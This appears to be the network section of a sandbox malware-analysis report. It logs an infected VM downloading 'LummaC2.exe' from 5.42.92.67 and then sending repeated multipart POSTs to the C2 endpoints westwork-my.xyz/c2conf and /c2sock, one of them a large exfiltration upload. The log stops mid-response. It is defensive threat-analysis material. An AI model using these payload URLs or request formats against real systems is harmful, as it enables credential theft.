Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
westwork-my.xyz | 104.21.72.18 | |
bitbucket.org | 104.192.141.1 |
- TCP Requests
-
-
192.168.56.101:49182 104.192.141.1:443bitbucket.org
-
192.168.56.101:49183 104.192.141.1:443bitbucket.org
-
192.168.56.101:49184 104.192.141.1:443bitbucket.org
-
192.168.56.101:49187 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49188 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49190 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49191 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49192 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49193 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49194 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49195 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49196 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49197 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49198 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49199 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49200 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49201 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49202 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49203 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49204 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49205 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49206 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49207 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49208 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49209 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49210 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49211 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49212 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49213 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49214 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49215 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49216 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49217 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49218 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49219 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49220 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49221 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49222 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49223 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49224 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49225 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49226 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49227 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49228 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49229 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49230 104.21.72.18:80westwork-my.xyz
-
192.168.56.101:49178 5.42.92.67:80
-
192.168.56.101:49180 5.42.92.67:80
-
192.168.56.101:49176 77.91.68.68:19071
-
POST
200
http://5.42.92.67/norm/index.php
REQUEST
RESPONSE
BODY
POST /norm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.92.67
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 24 Jul 2023 22:34:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
404
http://5.42.92.67/lend/http://5.42.92.67/lend/dewrww7a1z.exe
REQUEST
RESPONSE
BODY
GET /lend/http://5.42.92.67/lend/dewrww7a1z.exe HTTP/1.1
Host: 5.42.92.67
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 24 Jul 2023 22:34:00 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
POST
200
http://5.42.92.67/norm/index.php
REQUEST
RESPONSE
BODY
POST /norm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.92.67
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 24 Jul 2023 22:34:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://5.42.92.67/lend/LummaC2.exe
REQUEST
RESPONSE
BODY
GET /lend/LummaC2.exe HTTP/1.1
Host: 5.42.92.67
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 24 Jul 2023 22:34:01 GMT
Content-Type: application/octet-stream
Content-Length: 400896
Last-Modified: Mon, 24 Jul 2023 13:34:39 GMT
Connection: keep-alive
ETag: "64be7def-61e00"
Accept-Ranges: bytes
POST
200
http://5.42.92.67/norm/index.php
REQUEST
RESPONSE
BODY
POST /norm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.92.67
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 24 Jul 2023 22:34:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://5.42.92.67/norm/index.php
REQUEST
RESPONSE
BODY
POST /norm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.92.67
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 24 Jul 2023 22:34:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://westwork-my.xyz/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: TeslaBrowser/5.5
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 01 Jul 2023 17:37:18 GMT
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gA44DOlYBqhccWteZPSGNTKGKUJciP0QpVTQk%2BpFlX3FlxCSzI5zjiYf8tRo%2FBFMgMMn0Bv8OHh2hj9VwBIvkgwBm7EEqVh9SFLbDzP7ji5SsP7VtA9nICuYKT1VS%2BLAYOo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1077ed8833a-KIX
POST
200
http://westwork-my.xyz/c2conf
REQUEST
RESPONSE
BODY
POST /c2conf HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: westwork-my.xyz
Content-Length: 28
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=2pi7pvekldh7n1ejroqonn2aj2; expires=Fri, 17 Nov 2023 16:20:50 GMT; Max-Age=9999999; path=/
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mgKo1oAjYkw2qTmR9goMzyPFhzBxeQzh9mn4zV7BcNq6Ge9Kk1A1RWsSpxxuMmcuumDQe9zUvwL4mtScc3dE%2F%2BL6l80EvUOE3ZMWSgY%2BIsxYTsW5nwVuNCm9HJkqOskrkao%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa10b7d7d832f-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 1677739
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=k5itfgsjp4ljea39h5om7td45i; expires=Fri, 17 Nov 2023 16:20:53 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0VCcyNdq1GdUf3W6q9WmEdq35MObhGZr8r4Mi4GhkkQPH4%2BdUpv7w5Vo4lg4Be4nBPC0TJiAQ3A6zoUggUjysyhuh4ijHvXtFCQ4bW%2F5EIEsmhzerUZzyKyHbJpqooJJ%2BC0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa110ff6f834c-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=q6i40rbua6gp2bkmor3fjubt5q; expires=Fri, 17 Nov 2023 16:20:54 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wTXXBNmm7aJTXTPLik00ZE7D2K3aEaztKW27mIje8Gva8qmOTE%2BcrPQZJXoQ7lDmC9%2Fmk1ua51Y8Bc8gTe6cUKduCsNl0eDwmzmefkpET0xaSHWoIoKJxiSGb6g0O6DaFGk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa12448401a20-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=v71o1pmu2md94fc798028m8gs1; expires=Fri, 17 Nov 2023 16:20:55 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wfvi6MGhAnJd3e9AM4a3DW%2BkZ9RiK%2B0pMHrZXO8Cua8HQteUG61uQDjLJ%2FXnFMBn43sTsknF4oFYamupwzVOVrou%2Bk05JWj8DPRJVbb3DgqqiKtQ%2Bq4zwsRoc7M4AVNC%2FpE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa128397b0aa6-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=9fknan9agunuidor3josssn955; expires=Fri, 17 Nov 2023 16:20:55 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nj4dmynitzXVBVVZMGp0lrSaMxdc9KmBfFCmX7xkgy0vulszrsovVZOzyv3jWO%2Bjc4WY9cgrU0hXx2TVAKddYmsgFVa18RGtHAi%2BGfMXN%2B9BCbtM6aZvlfNUjl%2F8M5mx3D4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa12cfa081a3f-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=h2nn96rahb6u6srbg930daaifr; expires=Fri, 17 Nov 2023 16:20:56 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5%2B2GK0vfffzQ6WedXlKQbnlSksIwECU%2FJEIL2mY5Dg6vpD35dmqEB7YfQe7j0tULz0fZlzzlbTbUy4%2B68HX971HEImLCpiqo3jcmNU3uSgt9QXgiN8YaNfjgTRFKeb0dWrs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa131de68834a-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=sumh7ap2pfqdbm9d4esihcv95g; expires=Fri, 17 Nov 2023 16:20:57 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=taceXGjwOkAtRteaOSJvQB5zFdPkUUS8oHQf76dR5Vdgvy%2F92KdNzbWUK7KY3%2ByRe8T%2BoFTaKs0lnaIGoakO6UR%2B11sOI7a7AeW5ACnrhSDy7AlqitgBimuvtrAEu4qv2lk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa135b92f8341-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=bmiogdv65clnkghl8h9rldtd6i; expires=Fri, 17 Nov 2023 16:20:57 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B3WElGPUv0BCBfbDi5e1qsATpt%2FqqXi28rOHDnNYWjgmu6%2BdMEidNstVK1gbUDguwfJXMtitHV2J0HI9hvBJcRqsoCOkfq6Gf1I9ygWNHgZuDoSCi%2FL7hNaB%2Bj69vay%2FMR0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa139ad61832f-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=uicmk2g377o3rmh3qvbtq83ubf; expires=Fri, 17 Nov 2023 16:20:58 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6qdjQQRydES6LioIbNHhMPqpqsABSqslMX1cRatf%2B7ZxewSmxtz137jkw4rBw%2BGoa7cC9dJzCbA0RABfhgX2l7A32L43pmV0qFVaVrs941ruCAE2hd6pjCj%2Fsn7TL%2FEm90%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa13e6d9e8328-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=2gkjijgfl7h1an9gg8ibj74csm; expires=Fri, 17 Nov 2023 16:20:59 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KExNXEgKrVNrrtyiwzXdFdi%2FTwKURbu2%2BB9eSh2OYBxFR0v4fg1IUmWVlgONHh41jW6wR1sBoc5EBBFWS3kicxgvqmoQaZXX6slEYTVK1Ulm%2BT4NJGYWYBczd2rLO%2B%2BZLf8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1432ed48d01-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=j6tsaj91e231muh2a7cgk67h5n; expires=Fri, 17 Nov 2023 16:21:00 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Cp7cdEd8bPM4Rx9k7YCDJ0pswbNE4tW8XxNBwXZI26Nlq04k%2FkKbJoIivBxmQst16hOXgCVmotKp5KAxf3JjrJNiloeHzqcm8kMUvTpYJARH0HYQ%2F86LgztJ2efGDomKNuQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa147df8d834d-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=kdtrk2mfdcihk6j79sc55chr45; expires=Fri, 17 Nov 2023 16:21:00 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aSogxqapL8YnSQF3mhEq%2B2PJxIxH2j8fCRYasfDuxitm%2FmDu2SO85bufQEkjF3RfI44Tp8E2B9iSmpQVTIDWRVo%2BUWcu9KVWM9i9GhhvYsNPYrz44JzJkYiSJQI%2FIyuQ4YA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa14bce490a92-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=qo7utglc9oop3co5rtmfdu7ici; expires=Fri, 17 Nov 2023 16:21:01 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pkq%2FI5WEGh1WJMSsFzcABeHDwRAS9LtCNGqbUZwYWVr2hzTQHOw%2BTNkZ2gj7KnzbFQSIogfSbWt00NF1%2BkJjjW9A2ZcoXF66SPAXCi7fyOi1IHDJcy6y7gWQg6vItNxoiMo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1506ed60a8e-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=2ufen6f9amtjf0tq4a4rr58oj7; expires=Fri, 17 Nov 2023 16:21:02 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VBC%2FT%2B%2B0msKp9FKax7MpK1s1cxMtTWjsCIcNrtw2rUWloLOmzSk%2FEXi6NFglQ8PDvH4lX%2FC1ontnNKKjTSRTTUC%2F%2FG01O1cdk22iCVV%2FZ5wWI9r2RCboakWTX9fJ9BX1cJo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1546a918d28-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=a5o6255mr6ek3vgjdi1v0dhgst; expires=Fri, 17 Nov 2023 16:21:02 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gr8ZAe8YWNO4J7TtM2RDIcbrGOhKsGbuaQP6e14vv9T0uuQzonaeFbgUdTMOLXqKvpuVCmdWxjQK426MKg95Etgq3kvOafYNxQa2%2FMRosOCXKxvhoKoIE2%2FXAc8hU21vc98%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1591e051a32-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=rtgqh82crbrmfaag5uv7h8tkah; expires=Fri, 17 Nov 2023 16:21:03 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V9jVNBfbnKX8mSN%2BRRWjDutKYp%2BPKx3u6yVaOqLCuu0D1eEhJbnHZ33CWfmNGBSpV2NDaR0Aq1Df4KjgJ7bSfh%2FeRESaos%2Bpmb1S4SvfNFWrNltBOfzXlE9VStojVTcAn%2Fo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa15d2bf58384-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 19969
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=eiik0r61bs0j1kvkijvuoogav2; expires=Fri, 17 Nov 2023 16:21:04 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8w78AwqwQcM2crZTa4XT7YyqDx898gAU27Ol5OlqheG8LlIhPtNU9KPZsHSFmoHmMMQ0wy%2F0LDclI5usOOWMXYvb5WPC9Iuz1ro%2FLgrlLqA0i%2BM2H%2FZ%2BwxFKRU6%2FPj24p%2Bc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa162e9b08d2a-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:27 GMT
